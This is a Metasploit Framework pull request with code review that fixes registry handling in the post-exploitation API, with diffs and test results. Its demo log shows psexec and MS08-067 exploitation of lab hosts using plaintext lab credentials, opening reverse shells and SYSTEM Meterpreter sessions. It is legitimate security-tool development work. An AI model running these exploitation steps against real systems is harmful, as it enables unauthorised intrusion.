### PR TITLE
Fix Multiple Registry Related Issues

### PR DESCRIPTION
**Pull request by zeroSteiner**
This fixes a few (but not all 😞 ) registry-related issues in the Post API.

* Fixes how `REG_MULTI_SZ` is handled by Meterpreter sessions
* Fixes how `REG_BINARY` is handled by shell sessions
* Fixes how Powershell sessions identify missing keys and values
* Fixes view handling for shell sessions
* Adds `REG_BINARY`, `REG_MULTI_SZ`, `REG_QWORD` tests to `post/test/registry`
* Fixes the `Type` key data-type returned by `registry_getvalinfo`
* Fixes how `REG_EXPAND_SZ` is handled by Shell sessions
* Fixes Windows XP shell sessions reporting that they fail to read values

## REG_MULTI_SZ Handling By Meterpreter Sessions
The changes require [rapid7/meterpreter-payloads#587](https://github.com/rapid7/metasploit-payloads/pull/587) for the Windows Meterpreter and ensure that the Windows and Python Meterpreters can both read and write REG_MULTI_SZ values. The data block sent to Meterpreter is now consistently null terminated strings with a double null-terminator. This is consistent with what the Windows API expects. The Windows Meterpreter will handle string encoding. This also updates the `registry_getvalinfo` post API method to use an array of strings as both the argument and return type for `REG_MULTI_SZ`. This is consistent with it's behavior for `REG_DWORD` in the sense that the data type is dependent on the registry key value. The `post/gather/windows/enum_shares` module is the only instance in which this data type appears to be used from either a module or library and has been updated appropriately.

The command line syntax for the `reg` command in the Meterpreter UI is the same.

## REG_BINARY Handling By Shell Sessions
Shell sessions now properly encode the binary data so the command can execute successfully. On return the ascii-hex encoded blob is decoded, allowing the Post API to just deal with a binary string for both (Power)shell and Meterpreter sessions.

## Powershell Sessions Identify Missing Keys and Values
Powershell sessions don't appear to include the `Error:` string. Instead they just return a string with whitespace. The post API was updated to treat that as a non-existant key/value. This is probably a better approach anyways since the word "Error" may be different in other locales.

## View Handling For Shell Sessions
The `/reg:##` argument appeared to be in the wrong location. This moves it to the end of the command, allowing it to execute successfully.

## `Type` Key Data-Type
Shell sessions were returning a string in the `Type` key (which is the registry data-type, e.g. REG_SZ, REG_DWORD, etc.). The Meterpreter sessions returned the constant value which is a string. This inconsistency has been rectified, acknowledging the precedence set by the existing `post/test/registry` module. This was key to making (power)shell sessions pass the tests.

## REG_EXPAND_SZ Handling By Meterpreter Sessions
Shell sessions where causing the environment variables to be expanded at the time that the value was set in the registry. This meant that it was also expanded on retrieval. This updates the set routine to properly escape the `%` characters so that the value is set correctly. `REG_EXPAND_SZ` values are not expanded by anything upon read.

The API has been updated to handle this type in the same way as shells sessions, where the resulting value is expanded and not null terminated.

## Windows XP Shell Sessions Reporting Read Failures
The original tests for reading values included the default / native view along side the explicit 32-bit and 64-bit views. Windows XP does not offer the `/reg` command line option to specify an explicit view. This resulted in the entire test failing. This was updated by adding a `skip` function inspired by rspec and then using it when a shell session doesn't report that it offers the `/reg` argument to the `QUERY` subcommand. This allows those tests to be skipped when the target doesn't support it.

## Remaining Known Issues
These issues are still outstanding.

- [ ] Windows XP shell sessions don't handle unicode correctly
- [ ] Powershell sessions don't handle unicode correctly
- [ ] Stageless shell sessions fail *all* `post/test/registry` tests when run with `AutoRunScript`
    I haven't fully looked into this, but I suspect it has something to do with how the banner is handled. When a stageless shell session is used, it's not recognized as Windows, and then the module fails.
    ```
    ...
    [*] Running against session 4
    [*] Session type is shell and platform is 
    [-] FAILED: should create keys
    ...
    ```
- [ ] PHP Meterpreter session's registry-commands don't appear to be functional. See the footnote in [rapid7/metasploit-payloads#587](https://github.com/rapid7/metasploit-payloads/pull/587).

## Verification

List the steps needed to make sure this thing works

- [ ] Run the `post/test/registry` module for a Powershell session, see only the one issue (not handling unicode correctly)
- [ ] Run the `post/test/registry` module for a Shell session, see no failures (2 skips on XP)
- [ ] Run the `post/test/registry` module for a Meterpreter session, see no failures (need the changes from [rapid7/metasploit-payloads#587](https://github.com/rapid7/metasploit-payloads/pull/587))
- [ ] Run the `post/windows/gather/enum_shares` module for a Meterpreter session, see the full output
- [ ] Run the `reg` command to set and query REG_MULTI_SZ values from the Meterpreter UI
    - [ ] Run: `reg setval -k HKCU\\Testing -t REG_MULTI_SZ -v "test_multi" -d "line1\0line2\0line3"`
    - [ ] Run: `reg qureyval -k HKCU\\Testing -t REG_MULTI_SZ -v "test_multi"`
    - [ ] On the Windows target, load the value in the regedit, and see that line1, line2 and line3 are each on separate lines

<details>
<summary>Demo Output</summary>

The following demo opens five sessions, one powershell, two staged-shell and two Meterpreter (using the changes from [rapid7/metasploit-payloads#587](https://github.com/rapid7/metasploit-payloads/pull/587) and [rapid7/metasploit-payloads#585](https://github.com/rapid7/metasploit-payloads/pull/585)). It then shows that the  the `post/test/registry` module runs with only the expected failures. Finally, it shows that the `reg` command as provided by the Meterpreter UI continues to work with the `\0` syntax.

```
./msfconsole -r test.rc
[*] Using configured payload windows/shell/reverse_tcp
                                                  

Unable to handle kernel NULL pointer dereference at virtual address 0xd34db33f
EFLAGS: 00010046
eax: 00000001 ebx: f77c8c00 ecx: 00000000 edx: f77f0001
esi: 803bf014 edi: 8023c755 ebp: 80237f84 esp: 80237f60
ds: 0018   es: 0018  ss: 0018
Process Swapper (Pid: 0, process nr: 0, stackpage=80377000)


Stack: 90909090990909090990909090
       90909090990909090990909090
       90909090.90909090.90909090
       90909090.90909090.90909090
       90909090.90909090.09090900
       90909090.90909090.09090900
       ..........................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ccccccccc.................
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       .................ccccccccc
       cccccccccccccccccccccccccc
       cccccccccccccccccccccccccc
       ..........................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffffffffffffffffffffff
       ffffffff..................
       ffffffff..................
       ffffffff..................


Code: 00 00 00 00 M3 T4 SP L0 1T FR 4M 3W OR K! V3 R5 I0 N5 00 00 00 00
Aiee, Killing Interrupt handler
Kernel panic: Attempted to kill the idle task!
In swapper task - not syncing


       =[ metasploit v6.2.15-dev-80e4abe2b4               ]
+ -- --=[ 2241 exploits - 1182 auxiliary - 398 post       ]
+ -- --=[ 884 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use the edit command to open the 
currently active module in your editor

[*] Processing test.rc for ERB directives.
resource (test.rc)> loadpath test/modules
Loaded 38 modules:
    14 auxiliary modules
    13 exploit modules
    11 post modules
resource (test.rc)> use exploit/windows/smb/psexec
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
resource (test.rc)> set SMBUser smcintyre
SMBUser => smcintyre
resource (test.rc)> set SMBPass Password1!
SMBPass => Password1!
resource (test.rc)> set RHOST 192.168.159.10
RHOST => 192.168.159.10
resource (test.rc)> set AutoRunScript post/test/registry
AutoRunScript => post/test/registry
resource (test.rc)> set TARGET Automatic
TARGET => Automatic
resource (test.rc)> set PAYLOAD windows/x64/shell/reverse_tcp
PAYLOAD => windows/x64/shell/reverse_tcp
resource (test.rc)> set LHOST 192.168.159.128
LHOST => 192.168.159.128
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4509
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Sending stage (336 bytes) to 192.168.159.10
[*] Session ID 1 (192.168.159.128:4444 -> 192.168.159.10:56500) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: shell
[*] Running against session 1
[*] Session type is shell and platform is windows
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[*] Passed: 16; Failed: 0
[*] Command shell session 1 opened (192.168.159.128:4444 -> 192.168.159.10:56500) at 2022-09-08 13:23:59 -0400
[*] Session 1 created in the background.
resource (test.rc)> set TARGET Automatic
TARGET => Automatic
resource (test.rc)> set PAYLOAD windows/x64/powershell_reverse_tcp
PAYLOAD => windows/x64/powershell_reverse_tcp
resource (test.rc)> set LHOST 192.168.159.128
LHOST => 192.168.159.128
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 6532
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Session ID 2 (192.168.159.128:4444 -> 192.168.159.10:56502) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: powershell
[*] Running against session 2
[*] Session type is powershell and platform is windows
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[-] FAILED: should write REG_SZ unicode values
[+] should delete unicode keys
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[-] Passed: 15; Failed: 1
[*] Powershell session session 2 opened (192.168.159.128:4444 -> 192.168.159.10:56502) at 2022-09-08 13:24:04 -0400
[*] Session 2 created in the background.
resource (test.rc)> set TARGET Automatic
TARGET => Automatic
resource (test.rc)> set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
resource (test.rc)> set LHOST 192.168.159.128
LHOST => 192.168.159.128
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.159.10:445 - PowerShell found
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Powershell command length: 4507
[*] 192.168.159.10:445 - Executing the payload...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[*] Sending stage (200774 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local files may be incompatible with the Metasploit Framework
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[*] Session ID 3 (192.168.159.128:4444 -> 192.168.159.10:56503) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter
[*] Running against session 3
[*] Session type is meterpreter and platform is windows
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[*] Passed: 16; Failed: 0
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.10:56503) at 2022-09-08 13:24:13 -0400
[*] Session 3 created in the background.
resource (test.rc)> set TARGET Command
TARGET => Command
resource (test.rc)> set PAYLOAD cmd/windows/python/meterpreter/reverse_tcp
PAYLOAD => cmd/windows/python/meterpreter/reverse_tcp
resource (test.rc)> set LHOST 192.168.159.128
LHOST => 192.168.159.128
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445|msflab.local as user 'smcintyre'...
[*] 192.168.159.10:445 - Executing the command...
[*] 192.168.159.10:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.159.10[\svcctl] ...
[*] 192.168.159.10:445 - Obtaining a service manager handle...
[*] 192.168.159.10:445 - Creating the service...
[+] 192.168.159.10:445 - Successfully created the service
[*] 192.168.159.10:445 - Starting the service...
[*] Sending stage (40164 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.py is being used
[*] Session ID 4 (192.168.159.128:4444 -> 192.168.159.10:56504) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter
[!]  * missing Meterpreter features: stdapi_sys_config_getprivs
[*] Running against session 4
[*] Session type is meterpreter and platform is windows
[+] should create keys
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.159.10:445 - Removing the service...
[+] should write REG_BINARY values
[+] 192.168.159.10:445 - Successfully removed the service
[*] 192.168.159.10:445 - Closing service handle...
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[*] 192.168.159.10:445 - Checking if the file is unlocked...
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[-] 192.168.159.10:445 - Unable to get handle: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION
[-] 192.168.159.10:445 - Command seems to still be executing. Try increasing RETRY and DELAY
[*] 192.168.159.10:445 - Getting the command output...
[+] should return normalized values
[+] should enumerate keys and values
[*] Passed: 16; Failed: 0
[*] Meterpreter session 4 opened (192.168.159.128:4444 -> 192.168.159.10:56504) at 2022-09-08 13:24:19 -0400
[-] 192.168.159.10:445 - Unable to read file \Windows\Temp\SqGpukRPqKGEEawE.txt. RubySMB::Error::UnexpectedStatusCode: The server responded with an unexpected status code: STATUS_SHARING_VIOLATION.
[-] 192.168.159.10:445 - Error getting command output
[*] 192.168.159.10:445 - Executing cleanup...
[+] 192.168.159.10:445 - Cleanup was successful
[*] Session 4 created in the background.
resource (test.rc)> use exploit/windows/smb/ms08_067_netapi
[*] Using configured payload windows/shell/reverse_tcp
resource (test.rc)> set RHOST 192.168.159.113
RHOST => 192.168.159.113
resource (test.rc)> set PAYLOAD windows/shell/reverse_tcp
PAYLOAD => windows/shell/reverse_tcp
resource (test.rc)> set AutoRunScript post/test/registry
AutoRunScript => post/test/registry
resource (test.rc)> exploit -z
[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.113:445 - Automatically detecting the target...
[*] 192.168.159.113:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 192.168.159.113:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 192.168.159.113:445 - Attempting to trigger the vulnerability...
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (267 bytes) to 192.168.159.113
[*] Session ID 5 (192.168.159.128:4444 -> 192.168.159.113:1056) processing AutoRunScript 'post/test/registry'
[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: shell
[*] Running against session 5
[*] Session type is shell and platform is windows
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[-] FAILED: should write REG_SZ unicode values
[+] should delete unicode keys
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[*] SKIPPED: should read values with a 32-bit view (the target does not support non-native views)
[+] should read values with a 32-bit view
[*] SKIPPED: should read values with a 64-bit view (the target does not support non-native views)
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[-] Passed: 15; Failed: 1
[*] Command shell session 5 opened (192.168.159.128:4444 -> 192.168.159.113:1056) at 2022-09-08 13:24:29 -0400
[*] Session 5 created in the background.
resource (test.rc)> sessions

Active sessions
===============

  Id  Name  Type                        Information                                                                      Connection
  --  ----  ----                        -----------                                                                      ----------
  1         shell x64/windows           Shell Banner: Microsoft Windows [Version 10.0.17763.3232] -----                  192.168.159.128:4444 -> 192.168.159.10:56500 (192.168.159.10)
  2         powershell windows          Shell Banner: Windows PowerShell running as user DC$ on DC Copyright (C) Mic...  192.168.159.128:4444 -> 192.168.159.10:56502 (192.168.159.10)
  3         meterpreter x64/windows     NT AUTHORITY\SYSTEM @ DC                                                         192.168.159.128:4444 -> 192.168.159.10:56503 (192.168.159.10)
  4         meterpreter python/windows  NT AUTHORITY\SYSTEM @ DC                                                         192.168.159.128:4444 -> 192.168.159.10:56504 (192.168.159.10)
  5         shell x86/windows           Shell Banner: Microsoft Windows XP [Version 5.1.2600] -----                      192.168.159.128:4444 -> 192.168.159.113:1056 (192.168.159.113)

msf6 exploit(windows/smb/ms08_067_netapi) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > reg setval -k HKLM\\Software\\Testing -t REG_MULTI_SZ -v "test_multi" -d "line1\0line2\0line3"
Successfully set test_multi of REG_MULTI_SZ.
meterpreter > reg queryval -k HKLM\\Software\\Testing -t REG_MULTI_SZ -v "test_multi"
Key: HKLM\Software\Testing
Name: test_multi
Type: REG_MULTI_SZ
Data: line1\0line2\0line3
meterpreter > background 
[*] Backgrounding session 3...
msf6 exploit(windows/smb/ms08_067_netapi) > sessions -i 4
[*] Starting interaction with 4...

meterpreter > reg setval -k HKLM\\Software\\Testing -t REG_MULTI_SZ -v "test_multi2" -d "line1\0line2\0line3"
Successfully set test_multi2 of REG_MULTI_SZ.
meterpreter > reg queryval -k HKLM\\Software\\Testing -t REG_MULTI_SZ -v "test_multi2"
Key: HKLM\Software\Testing
Name: test_multi2
Type: REG_MULTI_SZ
Data: line1\0line2\0line3
meterpreter >
```

### CODE REVIEW

**Comment by gwillcox-r7** [comment]
Updated the description to link to the PR in Metasploit Payloads repo so GitHub can link things and we have a clickable link to navigate to the related issue.

**Comment by adfoster-r7** [comment]
Just confirming if there needs to be any changes to the PHP/Python Meterpreters?

**Comment by zeroSteiner** [comment]
Actually rapid7/metasploit-payloads#585 is probably necessary for the existence check in Python. I tested both Python 2.7 and 3.10 to ensure everything was working but I think my tests did include those changes.

For PHP, I never tested anything since I couldn't get the extension to load on a modern version and the commands were only registered when it was present. Without that extension, the API should fail over to the command variants like it would for Java.

**Comment by zeroSteiner** [comment]
Marked as a draft until I can fix:

- [ ] REG_EXPAND_SZ issues for all three session types
- [ ] Update tests for Windows XP to clarify that it's expected to fail

**Comment by jmartin-r7** [comment]
@msjenkins-r7 test this please.

File: lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb [hunk 1]
```diff
@@ -215,10 +215,17 @@ def Registry.set_value(hkey, name, type, data)
...
+      data = [data.to_i].pack('L<')
+    when REG_EXPAND_SZ
+      data += "\x00".b
+    when REG_MULTI_SZ
+      data = data.join("\x00".b) + "\x00\x00".b
+    when REG_QWORD
+      data = [data.to_i].pack('Q<')
+    when REG_SZ
+      data += "\x00".b
     end
```
Comment (jmartin-r7) [inline lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb:229]: This and `set_value_direct` look to share pattern should we consolidate that logic a private helper?

File: lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb [hunk 2]
```diff
@@ -267,10 +281,17 @@ def Registry.query_value_direct(root_key, base_key, name, perm = KEY_READ)
...
+      data = data[0..-2]
+    when REG_MULTI_SZ
+      data = data[0..-3].split("\x00".b)
+    when REG_QWORD
+      data = data.unpack1('Q<')
+    when REG_SZ
       data = data[0..-2]
-    elsif type == REG_DWORD
-      data = data.unpack('N')[0]
     end
```
Comment (jmartin-r7) [inline lib/rex/post/meterpreter/extensions/stdapi/sys/registry.rb:295]: Similar to other comment this and `query_value` look like common logic a private helper may consolidate.

**Review by jmartin-tech — COMMENTED** [review]
Some minor consolidation requests not blockers.

**Comment by adfoster-r7** [comment]
Tested multiple scenarios, documented here: https://github.com/rapid7/metasploit-framework/pull/17024

Verified test module:

```
loadpath test/modules
use test/registry
run session=-1
```

### payload/windows/meterpreter_reverse_tcp 🟢

```
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_QWORD values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[*] Passed: 18; Failed: 0
[*] Post module execution completed
```

### windows/x64/meterpreter_reverse_tcp 🟢 

```
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_QWORD values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[*] Passed: 18; Failed: 0
[*] Post module execution completed
```

### payload/cmd/windows/powershell_reverse_tcp 🔴 

```
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_QWORD values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[-] FAILED: should write REG_SZ unicode values
[+] should delete unicode keys
[-] Passed: 17; Failed: 1
[*] Post module execution completed
```


### python/meterpreter_reverse_tcp 🔴 

Will be fixed by: https://github.com/rapid7/metasploit-payloads/pull/585

```
[-] FAILED: should evaluate key existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_QWORD values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[-] Passed: 17; Failed: 1
[*] Post module execution completed
```

File: lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb [hunk 3]
```diff
@@ -1019,7 +1019,9 @@ def cmd_reg(*args)
               print_error('Invalid characters provided! Could not fully convert data provided to -d argument!')
               return false
             end
-           data = data.pack("C*")
+            data = data.pack("C*")
```
Comment (adfoster-r7) [inline lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:1022]: Similar to the above validation that's been added for REG_BINARY hex values, should we verify dword/qword/etc are digits only `\d+`?

A user might assume consistency between REG_BINARY and setting hex values for qword/dword, but the end result is writing 0 to the registry and reporting a successful write to the user

Comment (zeroSteiner) [reply lib/rex/post/meterpreter/ui/console/command_dispatcher/stdapi/sys.rb:1022]: That's a good call, I'll make that change!

**Comment by adfoster-r7** [comment]
@zeroSteiner metasploit-payloads is landed now; this needs a version bump for metasploit-payloads in the Gemfile :+1:

**Comment by zeroSteiner** [comment]
Don't we want to land https://github.com/rapid7/metasploit-payloads/pull/585 too and bump both at the same time?

**Comment by adfoster-r7** [comment]
Good call :+1:

Just tested the Python PR now as well, and landed it after some local testing went 🟢 

```
msf6 post(test/registry) > run test/registry session=-1

[!] SESSION may not be compatible with this module:
[!]  * incompatible session type: meterpreter
[!]  * incompatible session platform: python
[!]  * missing Meterpreter features: stdapi_sys_config_getprivs
[*] Running against session -1
[*] Session type is meterpreter and platform is python
[+] should create keys
[+] should write REG_BINARY values
[+] should write REG_DWORD values
[+] should write REG_EXPAND_SZ values
[+] should write REG_MULTI_SZ values
[+] should write REG_QWORD values
[+] should write REG_SZ values
[+] should delete keys
[+] should create unicode keys
[+] should write REG_SZ unicode values
[+] should delete unicode keys
[+] should evaluate key existence
[*] PENDING: should evaluate value existence
[+] should read values
[+] should read values with a 32-bit view
[+] should read values with a 64-bit view
[+] should return normalized values
[+] should enumerate keys and values
[*] Passed: 17; Failed: 0
[*] Post module execution completed
```

**Comment by zeroSteiner** [comment]
Payloads have been bumped and the tests all passed. Mildly surprised that none of the sizes needed to be updated but that may be because all the changes were in the stdapi extension so the unstaged payloads may not have been changed.

**Comment by adfoster-r7** [comment]
Confirmed that `windows/gather/enum_shares` is working for a meterpreter session

```
msf6 post(windows/gather/enum_shares) > run session=-1

[*] Running module against DESKTOP-N3MAG5R (192.168.123.145)
[*] The following shares were found:
[*] 	Name: ruby27
[*] 	Path: C:\tools\ruby27
[*] 	Type: DISK
[*] 
[*] 	Name: foo
[*] 	Path: C:\foo
[*] 	Type: DISK
[*] 
[*] 	Name: SMBBasic
[*] 	Path: C:\SMBBasic
[*] 	Type: DISK
[*] 
[*] Post module execution completed
```

**Comment by adfoster-r7** [comment]
## Release Notes

Fixes multiple issues with registry manipulation

**Pull request merged**